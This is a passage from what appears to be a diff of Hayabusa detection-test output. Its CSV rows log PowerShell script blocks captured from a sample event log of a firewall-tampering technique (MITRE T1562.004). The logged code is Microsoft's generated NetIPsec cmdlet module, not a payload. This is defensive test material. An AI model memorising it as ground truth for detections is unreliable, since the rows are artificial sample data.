$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' -Alias '*' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(Para",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"eter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' -Alias '*' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(Para",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"meterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 